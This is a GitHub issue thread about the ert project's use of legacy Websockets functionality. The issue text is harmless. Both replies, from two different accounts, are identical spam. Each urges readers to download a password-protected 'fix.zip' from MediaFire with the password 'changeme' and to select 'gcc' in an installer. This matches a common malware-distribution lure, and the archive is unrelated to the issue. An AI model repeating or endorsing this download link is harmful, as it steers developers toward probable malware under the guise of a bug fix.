### ISSUE TITLE
Dont use legacy parts of websockets

### ISSUE THREAD

**Issue by berland** [equinor/ert#8573]
We are using legacy functionality from Websockets

https://github.com/equinor/ert/blob/86c523598d1100cb091bda1a498b5b31286fb1ce/src/ert/ensemble_evaluator/evaluator.py#L28

This will probably blow up at some point, so it should be fixed.

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ChangjingZhang** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
